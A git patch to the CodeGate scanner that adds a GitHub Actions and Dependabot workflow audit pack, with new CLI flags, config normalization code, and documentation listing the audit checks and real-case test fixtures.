From a9ab51ade8d04e390608652ddac9d60fc4608f4f Mon Sep 17 00:00:00 2001 From: Jonathan Santilli <1774227+jonathansantilli@users.noreply.github.com> Date: Mon, 23 Mar 2026 11:51:27 +0000 Subject: [PATCH] feat: add workflow audit pack with real-case validation --- README.md | 63 +- docs/workflow-audit-parity-checklist.md | 58 ++ docs/workflow-audit-real-cases.md | 52 ++ src/cli.ts | 69 +- src/commands/scan-command.ts | 14 +- src/commands/scan-content-command.ts | 6 +- src/config.ts | 267 +++++++- src/config/inline-ignore.ts | 83 +++ src/config/suppression-policy.ts | 104 ++- src/layer2-static/action/parser.ts | 213 ++++++ src/layer2-static/action/types.ts | 43 ++ src/layer2-static/advisories/cache.ts | 62 ++ .../advisories/gha-advisory-client.ts | 13 + .../gha-known-vulnerable-actions.json | 4 + src/layer2-static/audits/registry.ts | 53 ++ src/layer2-static/audits/types.ts | 14 + src/layer2-static/dependabot/parser.ts | 242 +++++++ src/layer2-static/dependabot/types.ts | 56 ++ .../detectors/dependabot-cooldown.ts | 80 +++ .../detectors/dependabot-execution.ts | 86 +++ .../workflow-anonymous-definition.ts | 64 ++ .../detectors/workflow-archived-uses.ts | 193 ++++++ .../detectors/workflow-artipacked.ts | 81 +++ .../detectors/workflow-bot-conditions.ts | 141 ++++ .../detectors/workflow-cache-poisoning.ts | 87 +++ .../detectors/workflow-concurrency-limits.ts | 96 +++ .../detectors/workflow-dangerous-triggers.ts | 49 ++ .../workflow-excessive-permissions.ts | 83 +++ .../detectors/workflow-forbidden-uses.ts | 199 ++++++ .../detectors/workflow-github-env.ts | 64 ++ ...orkflow-hardcoded-container-credentials.ts | 119 ++++ .../detectors/workflow-impostor-commit.ts | 170 +++++ .../detectors/workflow-insecure-commands.ts | 92 +++ .../detectors/workflow-known-vuln-action.ts | 89 +++ .../detectors/workflow-misfeature.ts | 132 ++++ .../detectors/workflow-obfuscation.ts | 94 +++ .../workflow-overprovisioned-secrets.ts | 106 +++ .../detectors/workflow-ref-confusion.ts | 91 +++ .../workflow-ref-version-mismatch.ts | 251 +++++++ .../detectors/workflow-secrets-inherit.ts | 78 +++ .../detectors/workflow-secrets-outside-env.ts | 124 ++++ .../detectors/workflow-self-hosted-runner.ts | 86 +++ .../detectors/workflow-stale-action-refs.ts | 230 +++++++ .../detectors/workflow-superfluous-actions.ts | 93 +++ .../detectors/workflow-template-injection.ts | 114 ++++ .../workflow-undocumented-permissions.ts | 161 +++++ .../detectors/workflow-unpinned-images.ts | 141 ++++ .../detectors/workflow-unpinned-uses.ts | 77 +++ .../detectors/workflow-unredacted-secrets.ts | 124 ++++ .../detectors/workflow-unsound-condition.ts | 123 ++++ .../detectors/workflow-unsound-contains.ts | 115 ++++ .../workflow-use-trusted-publishing.ts | 87 +++ src/layer2-static/engine.ts | 628 ++++++++++++++++-- src/layer2-static/github/cache.ts | 59 ++ src/layer2-static/github/client.ts | 76 +++ .../workflow/injection-sinks.json | 5 + src/layer2-static/workflow/parser.ts | 108 +++ src/layer2-static/workflow/types.ts | 17 + src/pipeline.ts | 18 +- src/reporter/sarif.ts | 41 +- src/reporter/terminal.ts | 12 + src/scan.ts | 248 +++++-- src/types/finding.ts | 5 + .../.github/workflows/claude-dependabot.yml | 11 + .../workflows/pipeline-electron-lint.yml | 12 + .../.github/workflows/label.yml | 10 + .../.github/dependabot.yml | 8 + .../workflow-audits/real-cases/index.json | 26 + tests/cli/help-examples.test.ts | 7 + tests/cli/scan-command.test.ts | 64 ++ tests/cli/workflow-audit-command.test.ts | 90 +++ tests/config/config-precedence.test.ts | 67 ++ tests/config/inline-ignore.test.ts | 73 ++ tests/config/suppression-policy.test.ts | 64 ++ tests/fixtures/fixtures.test.ts | 20 + .../artifact-candidate-discovery.test.ts | 86 +++ tests/layer1/config-parser.test.ts | 26 + tests/layer1/user-scope-discovery.test.ts | 40 +- tests/layer2/action-parser.test.ts | 107 +++ tests/layer2/advisory-cache.test.ts | 63 ++ tests/layer2/audit-registry.test.ts | 65 ++ tests/layer2/dependabot-cooldown.test.ts | 50 ++ tests/layer2/dependabot-execution.test.ts | 48 ++ tests/layer2/dependabot-parser.test.ts | 122 ++++ tests/layer2/github-client.test.ts | 48 ++ .../workflow-anonymous-definition.test.ts | 42 ++ tests/layer2/workflow-archived-uses.test.ts | 86 +++ tests/layer2/workflow-artipacked.test.ts | 72 ++ tests/layer2/workflow-bot-conditions.test.ts | 65 ++ tests/layer2/workflow-cache-poisoning.test.ts | 74 +++ .../workflow-concurrency-limits.test.ts | 53 ++ .../workflow-dangerous-triggers.test.ts | 76 +++ .../workflow-excessive-permissions.test.ts | 79 +++ tests/layer2/workflow-forbidden-uses.test.ts | 78 +++ tests/layer2/workflow-github-env.test.ts | 54 ++ ...ow-hardcoded-container-credentials.test.ts | 63 ++ tests/layer2/workflow-impostor-commit.test.ts | 95 +++ .../layer2/workflow-insecure-commands.test.ts | 58 ++ .../layer2/workflow-known-vuln-action.test.ts | 60 ++ tests/layer2/workflow-misfeature.test.ts | 52 ++ tests/layer2/workflow-obfuscation.test.ts | 45 ++ .../workflow-overprovisioned-secrets.test.ts | 72 ++ tests/layer2/workflow-parser.test.ts | 46 ++ tests/layer2/workflow-real-cases.test.ts | 67 ++ tests/layer2/workflow-ref-confusion.test.ts | 70 ++ .../workflow-ref-version-mismatch.test.ts | 111 ++++ tests/layer2/workflow-secrets-inherit.test.ts | 57 ++ .../workflow-secrets-outside-env.test.ts | 74 +++ .../workflow-self-hosted-runner.test.ts | 54 ++ .../layer2/workflow-stale-action-refs.test.ts | 107 +++ .../workflow-superfluous-actions.test.ts | 41 ++ .../workflow-template-injection.test.ts | 117 ++++ .../workflow-undocumented-permissions.test.ts | 87 +++ tests/layer2/workflow-unpinned-images.test.ts | 63 ++ tests/layer2/workflow-unpinned-uses.test.ts | 74 +++ .../workflow-unredacted-secrets.test.ts | 71 ++ .../layer2/workflow-unsound-condition.test.ts | 51 ++ .../layer2/workflow-unsound-contains.test.ts | 51 ++ .../workflow-use-trusted-publishing.test.ts | 84 +++ tests/layer2/workflow-wave-b-engine.test.ts | 128 ++++ tests/layer2/workflow-wave-cde-engine.test.ts | 121 ++++ .../workflow-audit-parity-contract.test.ts | 61 ++ tests/pipeline/static-pipeline.test.ts | 4 +- tests/report/finding-fingerprint.test.ts | 4 +- tests/reporter/sarif.test.ts | 13 +- tests/reporter/terminal.test.ts | 11 + 126 files changed, 10192 insertions(+), 159 deletions(-) create mode 100644 docs/workflow-audit-parity-checklist.md create mode 100644 docs/workflow-audit-real-cases.md create mode 100644 src/config/inline-ignore.ts create mode 100644 src/layer2-static/action/parser.ts create mode 100644 src/layer2-static/action/types.ts create mode 100644 src/layer2-static/advisories/cache.ts create mode 100644 src/layer2-static/advisories/gha-advisory-client.ts create mode 100644 src/layer2-static/advisories/gha-known-vulnerable-actions.json create mode 100644 src/layer2-static/audits/registry.ts create mode 100644 src/layer2-static/audits/types.ts create mode 100644 src/layer2-static/dependabot/parser.ts create mode 100644 src/layer2-static/dependabot/types.ts create mode 100644 src/layer2-static/detectors/dependabot-cooldown.ts create mode 100644 src/layer2-static/detectors/dependabot-execution.ts create mode 100644 src/layer2-static/detectors/workflow-anonymous-definition.ts create mode 100644 src/layer2-static/detectors/workflow-archived-uses.ts create mode 100644 src/layer2-static/detectors/workflow-artipacked.ts create mode 100644 src/layer2-static/detectors/workflow-bot-conditions.ts create mode 100644 src/layer2-static/detectors/workflow-cache-poisoning.ts create mode 100644 src/layer2-static/detectors/workflow-concurrency-limits.ts create mode 100644 src/layer2-static/detectors/workflow-dangerous-triggers.ts create mode 100644 src/layer2-static/detectors/workflow-excessive-permissions.ts create mode 100644 src/layer2-static/detectors/workflow-forbidden-uses.ts create mode 100644 src/layer2-static/detectors/workflow-github-env.ts create mode 100644 src/layer2-static/detectors/workflow-hardcoded-container-credentials.ts create mode 100644 src/layer2-static/detectors/workflow-impostor-commit.ts create mode 100644 src/layer2-static/detectors/workflow-insecure-commands.ts create mode 100644 src/layer2-static/detectors/workflow-known-vuln-action.ts create mode 100644 src/layer2-static/detectors/workflow-misfeature.ts create mode 100644 src/layer2-static/detectors/workflow-obfuscation.ts create mode 100644 src/layer2-static/detectors/workflow-overprovisioned-secrets.ts create mode 100644 src/layer2-static/detectors/workflow-ref-confusion.ts create mode 100644 src/layer2-static/detectors/workflow-ref-version-mismatch.ts create mode 100644 src/layer2-static/detectors/workflow-secrets-inherit.ts create mode 100644 src/layer2-static/detectors/workflow-secrets-outside-env.ts create mode 100644 src/layer2-static/detectors/workflow-self-hosted-runner.ts create mode 100644 src/layer2-static/detectors/workflow-stale-action-refs.ts create mode 100644 src/layer2-static/detectors/workflow-superfluous-actions.ts create mode 100644 src/layer2-static/detectors/workflow-template-injection.ts create mode 100644 src/layer2-static/detectors/workflow-undocumented-permissions.ts create mode 100644 src/layer2-static/detectors/workflow-unpinned-images.ts create mode 100644 src/layer2-static/detectors/workflow-unpinned-uses.ts create mode 100644 src/layer2-static/detectors/workflow-unredacted-secrets.ts create mode 100644 src/layer2-static/detectors/workflow-unsound-condition.ts create mode 100644 src/layer2-static/detectors/workflow-unsound-contains.ts create mode 100644 src/layer2-static/detectors/workflow-use-trusted-publishing.ts create mode 100644 src/layer2-static/github/cache.ts create mode 100644 src/layer2-static/github/client.ts create mode 100644 src/layer2-static/workflow/injection-sinks.json create mode 100644 src/layer2-static/workflow/parser.ts create mode 100644 src/layer2-static/workflow/types.ts create mode 100644 test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml create mode 100644 test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml create mode 100644 test-fixtures/workflow-audits/real-cases/index.json create mode 100644 tests/cli/workflow-audit-command.test.ts create mode 100644 tests/config/inline-ignore.test.ts create mode 100644 tests/layer2/action-parser.test.ts create mode 100644 tests/layer2/advisory-cache.test.ts create mode 100644 tests/layer2/audit-registry.test.ts create mode 100644 tests/layer2/dependabot-cooldown.test.ts create mode 100644 tests/layer2/dependabot-execution.test.ts create mode 100644 tests/layer2/dependabot-parser.test.ts create mode 100644 tests/layer2/github-client.test.ts create mode 100644 tests/layer2/workflow-anonymous-definition.test.ts create mode 100644 tests/layer2/workflow-archived-uses.test.ts create mode 100644 tests/layer2/workflow-artipacked.test.ts create mode 100644 tests/layer2/workflow-bot-conditions.test.ts create mode 100644 tests/layer2/workflow-cache-poisoning.test.ts create mode 100644 tests/layer2/workflow-concurrency-limits.test.ts create mode 100644 tests/layer2/workflow-dangerous-triggers.test.ts create mode 100644 tests/layer2/workflow-excessive-permissions.test.ts create mode 100644 tests/layer2/workflow-forbidden-uses.test.ts create mode 100644 tests/layer2/workflow-github-env.test.ts create mode 100644 tests/layer2/workflow-hardcoded-container-credentials.test.ts create mode 100644 tests/layer2/workflow-impostor-commit.test.ts create mode 100644 tests/layer2/workflow-insecure-commands.test.ts create mode 100644 tests/layer2/workflow-known-vuln-action.test.ts create mode 100644 tests/layer2/workflow-misfeature.test.ts create mode 100644 tests/layer2/workflow-obfuscation.test.ts create mode 100644 tests/layer2/workflow-overprovisioned-secrets.test.ts create mode 100644 tests/layer2/workflow-parser.test.ts create mode 100644 tests/layer2/workflow-real-cases.test.ts create mode 100644 tests/layer2/workflow-ref-confusion.test.ts create mode 100644 tests/layer2/workflow-ref-version-mismatch.test.ts create mode 100644 tests/layer2/workflow-secrets-inherit.test.ts create mode 100644 tests/layer2/workflow-secrets-outside-env.test.ts create mode 100644 tests/layer2/workflow-self-hosted-runner.test.ts create mode 100644 tests/layer2/workflow-stale-action-refs.test.ts create mode 100644 tests/layer2/workflow-superfluous-actions.test.ts create mode 100644 tests/layer2/workflow-template-injection.test.ts create mode 100644 tests/layer2/workflow-undocumented-permissions.test.ts create mode 100644 tests/layer2/workflow-unpinned-images.test.ts create mode 100644 tests/layer2/workflow-unpinned-uses.test.ts create mode 100644 tests/layer2/workflow-unredacted-secrets.test.ts create mode 100644 tests/layer2/workflow-unsound-condition.test.ts create mode 100644 tests/layer2/workflow-unsound-contains.test.ts create mode 100644 tests/layer2/workflow-use-trusted-publishing.test.ts create mode 100644 tests/layer2/workflow-wave-b-engine.test.ts create mode 100644 tests/layer2/workflow-wave-cde-engine.test.ts create mode 100644 tests/meta/workflow-audit-parity-contract.test.ts diff --git a/README.md b/README.md index d7c2b96..dc9a40e 100644 --- a/README.md +++ b/README.md @@ -120,21 +120,26 @@ See the [Configuration](#configuration) section for full settings and examples. ## `scan` Command Flags -| Flag | Purpose | -| ---------------------- | --------------------------------------------------------------------------------------------------------- | -| `--deep` | Enable Layer 3 dynamic analysis. | -| `--remediate` | Enter remediation mode after scan. | -| `--fix-safe` | Auto-fix unambiguous critical findings. | -| `--dry-run` | Show proposed fixes but write nothing. | -| `--patch` | Generate a patch file for review workflows. | -| `--no-tui` | Disable TUI and interactive prompts. | -| `--format ` | Output format: `terminal`, `json`, `sarif`, `markdown`, `html`. | -| `--output ` | Write report to file instead of stdout. | -| `--verbose` | Show extended output in terminal format. | -| `--config ` | Use a specific global config file path. | -| `--force` | Skip interactive confirmations. | -| `--include-user-scope` | Force-enable user/home AI tool config paths for this run (useful if config disables user-scope scanning). | -| `--reset-state` | Clear persisted scan-state history and exit. | +| Flag | Purpose | +| ----------------------- | --------------------------------------------------------------------------------------------------------- | +| `--deep` | Enable Layer 3 dynamic analysis. | +| `--remediate` | Enter remediation mode after scan. | +| `--fix-safe` | Auto-fix unambiguous critical findings. | +| `--dry-run` | Show proposed fixes but write nothing. | +| `--patch` | Generate a patch file for review workflows. | +| `--no-tui` | Disable TUI and interactive prompts. | +| `--format ` | Output format: `terminal`, `json`, `sarif`, `markdown`, `html`. | +| `--output ` | Write report to file instead of stdout. | +| `--verbose` | Show extended output in terminal format. | +| `--config ` | Use a specific global config file path. | +| `--force` | Skip interactive confirmations. | +| `--include-user-scope` | Force-enable user/home AI tool config paths for this run (useful if config disables user-scope scanning). | +| `--collect ` | Collection scope mode (`default`, `project`, `user`, `explicit`, `all`). Repeatable. | +| `--strict-collection` | Treat parse failures in collected inputs as high-severity findings. | +| `--persona ` | Audit sensitivity (`regular`, `pedantic`, `auditor`). | +| `--runtime-mode ` | Runtime mode for optional online audits (`offline`, `online`, `online-no-audits`). | +| `--workflow-audits` | Enable CI/CD audit pack for GitHub workflow, action, and Dependabot inputs. | +| `--reset-state` | Clear persisted scan-state history and exit. | Examples: @@ -148,9 +153,37 @@ codegate scan . --deep --force codegate scan . --remediate codegate scan . --fix-safe codegate scan . --remediate --dry-run --patch +codegate scan . --workflow-audits --collect project --persona auditor --runtime-mode online +codegate scan . --workflow-audits --strict-collection codegate scan . --reset-state ``` +## Workflow Audit Pack + +CodeGate can audit GitHub Actions workflows when `--workflow-audits` is enabled. + +Current checks include: + +- Unpinned external action references (`uses: owner/repo@tag` instead of commit SHA) +- High-risk triggers (`pull_request_target`, `workflow_run`) +- Overly broad permissions (`write-all` and explicit write grants) +- Template expression injection patterns in run steps and known sink inputs +- Known vulnerable action references (online runtime mode) +- Dependabot cooldown and execution-risk checks +- Workflow hygiene checks (concurrency gates, obfuscation, unsafe conditional trust) + +Track the current workflow-audit coverage and backlog in the [workflow audit parity checklist](docs/workflow-audit-parity-checklist.md). +Real public validation fixtures and source provenance are documented in [workflow audit real-case corpus](docs/workflow-audit-real-cases.md). + +Examples: + +```bash +codegate scan . --workflow-audits +codegate scan . --workflow-audits --collect project --persona auditor +codegate scan . --workflow-audits --runtime-mode online +codegate scan . --workflow-audits --collect-kind dependabot +``` + ## `scan-content` Command `codegate scan-content ` scans inline content directly from the command line. It is useful when you want to inspect JSON, YAML, TOML, Markdown, or plain text before writing it to disk or installing it into a tool configuration. diff --git a/docs/workflow-audit-parity-checklist.md b/docs/workflow-audit-parity-checklist.md new file mode 100644 index 0000000..3716e06 --- /dev/null +++ b/docs/workflow-audit-parity-checklist.md @@ -0,0 +1,58 @@ +# CodeGate Workflow Audit Parity Checklist + +Use this checklist to track the workflow-audit detectors implemented in CodeGate and the backlog that remains. + +## Wave A + +- [x] `dangerous-triggers` +- [x] `excessive-permissions` +- [x] `known-vulnerable-actions` +- [x] `template-injection` +- [x] `unpinned-uses` +- [x] `artipacked` +- [x] `cache-poisoning` +- [x] `github-env` +- [x] `insecure-commands` +- [x] `self-hosted-runner` +- [x] `overprovisioned-secrets` +- [x] `secrets-outside-env` +- [x] `secrets-inherit` +- [x] `use-trusted-publishing` +- [x] `undocumented-permissions` + +## Wave B + +- [x] `archived-uses` +- [x] `stale-action-refs` +- [x] `forbidden-uses` +- [x] `ref-confusion` +- [x] `ref-version-mismatch` +- [x] `impostor-commit` +- [x] `unpinned-images` + +## Wave C + +- [x] `anonymous-definition` +- [x] `concurrency-limits` +- [x] `superfluous-actions` +- [x] `misfeature` +- [x] `obfuscation` +- [x] `unsound-condition` +- [x] `unsound-contains` + +## Wave D + +- [x] `dependabot-cooldown` +- [x] `dependabot-execution` + +## Wave E + +- [x] `hardcoded-container-credentials` +- [x] `unredacted-secrets` +- [x] `bot-conditions` + +## Notes + +- Checked items are implemented in CodeGate. +- Unchecked items remain in the backlog. +- The checklist is intentionally limited to CodeGate workflow-audit terminology. diff --git a/docs/workflow-audit-real-cases.md b/docs/workflow-audit-real-cases.md new file mode 100644 index 0000000..79d2ee3 --- /dev/null +++ b/docs/workflow-audit-real-cases.md @@ -0,0 +1,52 @@ +# Workflow Audit Real-Case Corpus + +This document tracks real public workflow/dependabot examples used to validate workflow-audit detections locally. + +## Local Corpus + +Root: + +- `test-fixtures/workflow-audits/real-cases/` +- `test-fixtures/workflow-audits/real-cases/index.json` + +Each fixture is commit-pinned to keep source provenance stable. + +## Cases + +1. `RC-01-bot-conditions` + +- Expected rule: `bot-conditions` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-01-bot-conditions/.github/workflows/claude-dependabot.yml` + +2. `RC-02-obfuscation` + +- Expected rule: `workflow-obfuscation` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-02-obfuscation/.github/workflows/pipeline-electron-lint.yml` + +3. `RC-03-concurrency-limits` + +- Expected rule: `workflow-concurrency-limits` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-03-concurrency-limits/.github/workflows/label.yml` + +4. `RC-04-dependabot-execution` + +- Expected rule: `dependabot-execution` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-04-dependabot-execution/.github/dependabot.yml` + +## Validation + +Run targeted test: + +```bash +npm test -- tests/layer2/workflow-real-cases.test.ts +``` + +Run CLI manually: + +```bash +codegate scan test-fixtures/workflow-audits/real-cases/RC-02-obfuscation --workflow-audits --no-tui --format json +``` diff --git a/src/cli.ts b/src/cli.ts index 4e3db67..68c7e01 100644 --- a/src/cli.ts +++ b/src/cli.ts @@ -10,6 +10,10 @@ import { Command, Option } from "commander"; import { DEFAULT_CONFIG, OUTPUT_FORMATS, + PERSONAS, + RUNTIME_MODES, + SCAN_COLLECTION_MODES, + SCAN_COLLECTION_KINDS, resolveEffectiveConfig, type CliConfigOverrides, type CodeGateConfig, @@ -286,6 +290,8 @@ const defaultCliDeps: CliDeps = { prepareScanDiscovery: (scanTarget, config, options) => createScanDiscoveryContext(scanTarget, undefined, { includeUserScope: config?.scan_user_scope === true, + collectModes: config?.scan_collection_modes, + collectKinds: config?.scan_collection_kinds, parseSelected: true, explicitCandidates: options?.explicitCandidates, }), @@ -318,6 +324,8 @@ const defaultCliDeps: CliDeps = { ? discoverDeepScanResourcesFromContext(discoveryContext) : discoverDeepScanResources(scanTarget, undefined, { includeUserScope: config?.scan_user_scope === true, + collectModes: config?.scan_collection_modes, + collectKinds: config?.scan_collection_kinds, }), discoverLocalTextTargets: (_scanTarget, _config, discoveryContext) => discoveryContext ? discoverLocalTextAnalysisTargetsFromContext(discoveryContext) : [], @@ -362,6 +370,34 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void .option("--config ", "use a specific global config file") .option("--force", "skip interactive confirmations") .option("--include-user-scope", "include user/home AI tool config paths in scan") + .addOption( + new Option( + "--collect ", + "collection mode (repeatable): default, project, user, explicit, all", + ) + .choices([...SCAN_COLLECTION_MODES]) + .argParser((value: string, previous: string[] = []) => [...previous, value]), + ) + .addOption( + new Option( + "--collect-kind ", + "collection kind (repeatable): workflows, actions, dependabot", + ) + .choices([...SCAN_COLLECTION_KINDS]) + .argParser((value: string, previous: string[] = []) => [...previous, value]), + ) + .option("--strict-collection", "treat parse failures in collected inputs as high severity") + .addOption( + new Option("--persona ", "audit sensitivity persona") + .choices([...PERSONAS]) + .argParser((value) => value), + ) + .addOption( + new Option("--runtime-mode ", "runtime network mode for optional online audits") + .choices([...RUNTIME_MODES]) + .argParser((value) => value), + ) + .option("--workflow-audits", "enable workflow security audit pack for .github/workflows") .option("--skill ", "select one skill directory when scanning a skills index repo URL") .option("--reset-state", "clear persisted scan-state history and exit") .addHelpText( @@ -371,6 +407,7 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void "codegate scan ./skills/security-review/SKILL.md", "codegate scan https://github.com/owner/repo", "codegate scan https://github.com/owner/repo --skill security-review", + "codegate scan . --workflow-audits --collect project --persona auditor --runtime-mode online", "codegate scan https://github.com/owner/repo/blob/main/skills/security-review/SKILL.md", "codegate scan https://example.com/security-review/SKILL.md --format json", ]), @@ -388,6 +425,7 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void let resolvedTarget: ResolvedScanTarget | undefined; try { + const scanOptions = options as ScanCommandOptions & { collectKind?: string[] }; const resolveTarget = deps.resolveScanTarget ?? ((input: { @@ -412,13 +450,30 @@ function addScanCommand(program: Command, version: string, deps: CliDeps): void scanTarget, cli: cliConfig, }); - const config = - options.includeUserScope === true - ? { - ...baseConfig, - scan_user_scope: true, - } - : baseConfig; + const config = { + ...baseConfig, + scan_collection_modes: + options.collect && options.collect.length > 0 + ? options.collect + : baseConfig.scan_collection_modes, + scan_collection_kinds: (scanOptions.collectKind && scanOptions.collectKind.length > 0 + ? scanOptions.collectKind + : baseConfig.scan_collection_kinds) as CodeGateConfig["scan_collection_kinds"], + strict_collection: + options.strictCollection === true + ? true + : (baseConfig.strict_collection ?? DEFAULT_CONFIG.strict_collection), + persona: options.persona ?? baseConfig.persona, + runtime_mode: options.runtimeMode ?? baseConfig.runtime_mode, + workflow_audits: { + enabled: + options.workflowAudits === true + ? true + : (baseConfig.workflow_audits?.enabled ?? false), + }, + scan_user_scope: + options.includeUserScope === true ? true : (baseConfig.scan_user_scope ?? false), + }; if (options.resetState) { const reset = deps.resetScanState ?? ((path?: string) => resetScanState(path)); diff --git a/src/commands/scan-command.ts b/src/commands/scan-command.ts index 277d776..6867a72 100644 --- a/src/commands/scan-command.ts +++ b/src/commands/scan-command.ts @@ -1,5 +1,12 @@ import { resolve } from "node:path"; -import { applyConfigPolicy, type CodeGateConfig, type OutputFormat } from "../config.js"; +import { + applyConfigPolicy, + type AuditPersona, + type CodeGateConfig, + type OutputFormat, + type RuntimeMode, + type ScanCollectionMode, +} from "../config.js"; import { buildMetaAgentCommand, type MetaAgentCommand, @@ -52,6 +59,11 @@ export interface ScanCommandOptions { resetState?: boolean; includeUserScope?: boolean; skill?: string; + collect?: ScanCollectionMode[]; + strictCollection?: boolean; + persona?: AuditPersona; + runtimeMode?: RuntimeMode; + workflowAudits?: boolean; } export interface ScanRunnerInput { diff --git a/src/commands/scan-content-command.ts b/src/commands/scan-content-command.ts index 5303d48..3c1a1fe 100644 --- a/src/commands/scan-content-command.ts +++ b/src/commands/scan-content-command.ts @@ -43,7 +43,7 @@ export async function executeScanContentCommand( const kbVersion = loadKnowledgeBase().schemaVersion; const report = applyConfigPolicy( - runStaticPipeline({ + await runStaticPipeline({ version: input.version, kbVersion, scanTarget: `scan-content:${input.type}`, @@ -71,6 +71,10 @@ export async function executeScanContentCommand( rulePackPaths: input.config.rule_pack_paths, allowedRules: input.config.allowed_rules, skipRules: input.config.skip_rules, + persona: input.config.persona, + runtimeMode: input.config.runtime_mode, + workflowAuditsEnabled: input.config.workflow_audits?.enabled === true, + rulePolicies: input.config.rules, }, }), input.config, diff --git a/src/config.ts b/src/config.ts index c4ff1ae..685774a 100644 --- a/src/config.ts +++ b/src/config.ts @@ -5,11 +5,28 @@ import { parse as parseJsonc } from "jsonc-parser"; import type { Finding } from "./types/finding.js"; import type { CodeGateReport } from "./types/report.js"; import { applyReportSummary, computeExitCode as computeReportExitCode } from "./report-summary.js"; -import { applySuppressionPolicy, type SuppressionRule } from "./config/suppression-policy.js"; +import { + applySuppressionPolicy, + type RulePolicyConfig, + type RulePolicyMap, + type SuppressionRule, +} from "./config/suppression-policy.js"; export const OUTPUT_FORMATS = ["terminal", "json", "sarif", "markdown", "html"] as const; export type OutputFormat = (typeof OUTPUT_FORMATS)[number]; +export const SCAN_COLLECTION_MODES = ["default", "project", "user", "explicit", "all"] as const; +export type ScanCollectionMode = (typeof SCAN_COLLECTION_MODES)[number]; + +export const SCAN_COLLECTION_KINDS = ["workflows", "actions", "dependabot"] as const; +export type ScanCollectionKind = (typeof SCAN_COLLECTION_KINDS)[number]; + +export const PERSONAS = ["regular", "pedantic", "auditor"] as const; +export type AuditPersona = (typeof PERSONAS)[number]; + +export const RUNTIME_MODES = ["offline", "online", "online-no-audits"] as const; +export type RuntimeMode = (typeof RUNTIME_MODES)[number]; + export const SEVERITY_THRESHOLDS = ["critical", "high", "medium", "low", "info"] as const; export type SeverityThreshold = (typeof SEVERITY_THRESHOLDS)[number]; @@ -25,6 +42,10 @@ export interface ToolDiscoveryConfig { skip_tools: string[]; } +export interface WorkflowAuditConfig { + enabled: boolean; +} + export interface CodeGateConfig { severity_threshold: SeverityThreshold; auto_proceed_below_threshold: boolean; @@ -46,6 +67,13 @@ export interface CodeGateConfig { rule_pack_paths?: string[]; allowed_rules?: string[]; skip_rules?: string[]; + strict_collection?: boolean; + scan_collection_modes?: ScanCollectionMode[]; + scan_collection_kinds?: ScanCollectionKind[]; + rules?: RulePolicyMap; + persona?: AuditPersona; + runtime_mode?: RuntimeMode; + workflow_audits?: WorkflowAuditConfig; suppress_findings: string[]; suppression_rules?: SuppressionRule[]; } @@ -83,6 +111,15 @@ interface PartialCodeGateConfig { rule_pack_paths?: string[]; allowed_rules?: string[]; skip_rules?: string[]; + strict_collection?: boolean; + scan_collection_modes?: string[]; + scan_collection_kinds?: string[]; + rules?: Record; + persona?: string; + runtime_mode?: string; + workflow_audits?: { + enabled?: boolean; + }; suppress_findings?: string[]; suppression_rules?: SuppressionRule[]; } @@ -131,10 +168,21 @@ export const DEFAULT_CONFIG: CodeGateConfig = { rule_pack_paths: [], allowed_rules: [], skip_rules: [], + strict_collection: false, + scan_collection_modes: ["default"], + persona: "regular", + runtime_mode: "offline", + workflow_audits: { enabled: false }, suppress_findings: [], suppression_rules: [], }; +interface PartialRulePolicyConfig { + disable?: boolean; + ignore?: string[]; + config?: Record; +} + function normalizeOutputFormat(value: string | undefined): OutputFormat | undefined { if (!value) { return undefined; @@ -157,6 +205,180 @@ function normalizeOptionalPath(value: string | undefined): string | undefined { return trimmed.length > 0 ? trimmed : undefined; } +function normalizeCollectionMode(value: string | undefined): ScanCollectionMode | undefined { + if (!value) { + return undefined; + } + return SCAN_COLLECTION_MODES.find((mode) => mode === value) ?? undefined; +} + +function normalizeCollectionModes(values: string[] | undefined): ScanCollectionMode[] | undefined { + if (!values) { + return undefined; + } + + const normalized: ScanCollectionMode[] = []; + for (const value of values) { + const mode = normalizeCollectionMode(value); + if (!mode || normalized.includes(mode)) { + continue; + } + normalized.push(mode); + } + + return normalized.length > 0 ? normalized : undefined; +} + +function normalizeCollectionKind(value: string | undefined): ScanCollectionKind | undefined { + if (!value) { + return undefined; + } + return SCAN_COLLECTION_KINDS.find((kind) => kind === value) ?? undefined; +} + +function normalizeCollectionKinds(values: string[] | undefined): ScanCollectionKind[] | undefined { + if (!values) { + return undefined; + } + + const normalized: ScanCollectionKind[] = []; + for (const value of values) { + const kind = normalizeCollectionKind(value); + if (!kind || normalized.includes(kind)) { + continue; + } + normalized.push(kind); + } + + return normalized.length > 0 ? normalized : undefined; +} + +function isPlainObject(value: unknown): value is Record { + return !!value && typeof value === "object" && !Array.isArray(value); +} + +function normalizeRulePolicyConfig(value: unknown): RulePolicyConfig | undefined { + if (!isPlainObject(value)) { + return undefined; + } + + const disable = typeof value.disable === "boolean" ? value.disable : undefined; + const ignoreRaw = value.ignore; + const ignore = + Array.isArray(ignoreRaw) && ignoreRaw.length > 0 + ? ignoreRaw + .filter((entry): entry is string => typeof entry === "string") + .map((entry) => entry.trim()) + .filter((entry) => entry.length > 0) + : undefined; + const configRaw = value.config; + const config = isPlainObject(configRaw) ? { ...configRaw } : undefined; + + if (disable === undefined && ignore === undefined && config === undefined) { + return undefined; + } + + return { + disable, + ignore, + config, + }; +} + +function normalizeRulePolicyMap( + rules: Record | undefined, +): RulePolicyMap | undefined { + if (!rules || typeof rules !== "object") { + return undefined; + } + + const normalized: RulePolicyMap = {}; + + for (const [ruleId, value] of Object.entries(rules)) { + const key = ruleId.trim(); + if (key.length === 0) { + continue; + } + + const policy = normalizeRulePolicyConfig(value); + if (!policy) { + continue; + } + + normalized[key] = policy; + } + + return Object.keys(normalized).length > 0 ? normalized : undefined; +} + +function mergeRulePolicyConfig( + current: RulePolicyConfig | undefined, + incoming: RulePolicyConfig | undefined, +): RulePolicyConfig | undefined { + if (!current) { + if (!incoming) { 